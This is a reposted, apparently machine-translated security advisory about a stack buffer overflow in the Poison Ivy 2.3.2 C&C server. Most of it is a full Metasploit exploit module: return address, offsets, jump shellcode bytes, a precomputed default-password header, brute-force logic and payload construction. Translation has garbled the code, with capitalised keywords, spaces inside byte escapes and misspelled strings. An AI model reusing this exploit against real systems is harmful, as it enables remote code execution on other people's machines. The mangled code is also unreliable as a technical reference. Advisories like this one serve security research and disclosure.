Poison Ivy 'C & amp; C' Server Buffer Overflow Vulnerability

Source: Internet
Author: User

Release date:
Updated on:

Affected Systems:
Poison Ivy 2.3.2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54339

Poison Ivy is a remote management tool.

Poison Ivy 2.3.2 has a stack buffer overflow vulnerability. Attackers can exploit this vulnerability to execute arbitrary code in affected applications.

<* Source: Metasploit
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Metasploit () provides the following test methods:


##
# This file is part of the Metasploit Framework and may be subject
# Redistribution and specified cial restrictions. Please see the Metasploit
# Web site for more information on licensing and terms of use.
# Http://metasploit.com/
##

Require 'msf/core'

Class Metasploit3 <Msf: Exploit: Remote
Rank = NormalRanking

Include Msf: Exploit: Remote: Tcp
Include Msf: Exploit: Brute

Def initialize (info = {})
Super (update_info (info,
'Name' => "Poison Ivy 2.3.2 C & C Server Buffer Overflow ",
'Description' => % q {
This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C & C server.
The exploit does not need to know the password chosen for the bot/server
Communication. If the C & C is configured with the default 'admin' password,
The exploit shoshould work fine. In case of the C & C configured with another
Password the exploit can fail. The 'check' command can be used to determine
If the C & C target is using the default 'admin' password.

Hopefully an exploit try won't crash the Poison Ivy C & C process, just the thread
Responsible of handling the connection. Because of this module provides
RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header
Will be used. If the bruteforce target is selected, a random header will be sent in
Case the default for the password 'admin' doesn' t work. Bruteforce will stop after
5 tries or a session obtained.
},
'License '=> MSF_LICENSE,
'Author' =>
[
'Andrzej Dereszowski ', # Vulnerability Discovery
'Gal badishi', # Exploit and Metasploit module
'Juan vazquez' # Testing and little of Metasploit-fu
],
'References '=>
[
['Url', 'HTTP: // www. signal11.eu/en/research/articles/targeted_2010.pdf '],
['Url', 'HTTP: // badishi.com/own-and-you-shall-be-owned']
],
'Disclosuredate' => "Jun 24 2012 ",
'Defaultopexception' =>
{
'Deletec' => 'thread ',
},
'Payload' =>
{
'Stackadjustment' =>-4000,
'Space' => 10000,
'Badchars' => "",
},
'Platform' => 'win ',
'Targets' =>
[
['Ison Ivy 2.3.2/Windows XP SP3/Windows 7 SP1 ',
{
'Ret '=> 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
'Rwaddress' => 0x00401000,
'Offset' => 0x806D,
'Payloadoffset '=> 0x75,
'Jmppayload' => "\ x81 \ xec \ x00 \ x80 \ x00 \ x00 \ xff \ xe4" # sub esp, 0x8000 # jmp esp
}
],
['Ison Ivy 2.3.2-Bruteforce/Windows XP SP3/Windows 7 SP1 ',
{
'Ret '=> 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
'Rwaddress' => 0x00401000,
'Offset' => 0x806D,
'Payloadoffset '=> 0x75,
'Jmppayload' => "\ x81 \ xec \ x00 \ x80 \ x00 \ x00 \ xff \ xe4", # sub esp, 0x8000 # jmp esp
'Bruteforce' =>
{
'Start' => {'try' => 1 },
'Stop' => {'try' => 6 },
'Step' => 1,
'Delay' => 2
}
}
],
],
'Defaulttarget' => 0
))

Register_options (
[
Opt: RPORT (3460 ),
OptBool. new ('randhead', [true, 'Send random bytes as the header', false])
], Self. class)

Register_advanced_options (
[
OptInt. new ('brutewait', [false, "Delay between brute force attempts", 2]),
], Self. class)

End

Def check
Sig = "\ x35 \ xe1 \ x06 \ x6c \ xcd \ x15 \ x87 \ x3e \ xee \ xf8 \ x51 \ x89 \ x66 \ xb7 \ x0f \ x8b"
Lensig = [0x000015D0]. pack ("V ")

Connect
Sock. put ("\ x00" x 256)
Response = sock. read (1, 256)
Datalen = sock. read (4)
Disconnect

If datalen = lensig
If response [0, 16] = sig
Print_status ("Password appears to be \" admin \"")
Else
Print_status ("Unknown password-Bruteforce target or RANDHEADER can be tried and exploit launched until success .")
End
Return Exploit: CheckCode: Vulnerable
End
Return Exploit: CheckCode: Safe
End

Def single_exploit
If datastore ['randhead'] = true
# Generate a random header-allows multiple invocations of the exploit if it fails because we don't know the password
Header = rand_text (0x20)
Else
# This is the 32-byte header we want to send, encrypted with the default password ("admin ")
# We have a very good chance of succeeding even if the password was changed
Header = "\ xe7 \ x77 \ x44 \ x30 \ x9a \ xe8 \ x4b \ x79 \ xa6 \ x3f \ x11 \ xcd \ x58 \ xab \ x0c \ xdf \ x2a \ xcc \ xea \ x77 \ x6f \ x8c \ x27 \ x50 \ xda \ x30 \ x76 \ x00 \ x5d \ x15 \ xde \ xb7"
End
Do_exploit (header)
End

Def brute_exploit (brute_target)
If brute_target ['try'] = 1
Print_status ("Bruteforcing-Try # {brute_target ['try']}: Header for 'admin' password ")
# This is the 32-byte header we want to send, encrypted with the default password ("admin ")
# We have a very good chance of succeeding even if the password was changed
Header = "\ xe7 \ x77 \ x44 \ x30 \ x9a \ xe8 \ x4b \ x79 \ xa6 \ x3f \ x11 \ xcd \ x58 \ xab \ x0c \ xdf \ x2a \ xcc \ xea \ x77 \ x6f \ x8c \ x27 \ x50 \ xda \ x30 \ x76 \ x00 \ x5d \ x15 \ xde \ xb7"
Else
Print_status ("Bruteforcing-Try # {brute_target ['try']}: Random Header ")
# Generate a random header-allows multiple invocations of the exploit if it fails because we don't know the password
Header = rand_text (0x20)
End
Do_exploit (header)
End

Def do_exploit (header)
# Handshake
Connect
Print_status ("Deming handshake ...")
Sock. put ("\ x00" x 256)
Sock. get

# Don't change the nulls, or it might not work
Xploit =''
Xploit Xploit <"\ x00" * (target ['payloadoffset ']-xploit. length)
Xploit <payload. encoded
Xploit <"\ x00" * (target ['offset']-xploit. length)
Xploit <[target. ret]. pack ("V") # ret to a jmp esp opcode
Xploit <[target ['rwaddress']. pack ("V") # Readable/writeable-will be cleaned by original ret 4 (esp will point to the next dword)
Xploit <target ['jmppayload'] # This comes immediately after ret-it is a setup for the payload (jmp back)

# The disconnection triggers the exploit
Print_status ("Sending exploit ...")
Sock. put (xploit)
Select (nil, 5)
Disconnect
End

End

= Begin

* ROP version of exploit (): Has been discarded at the moment because of two reasons:

(1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process)
(2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter

= End

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Poison Ivy
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.poisonivy-rat.com/index.php

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.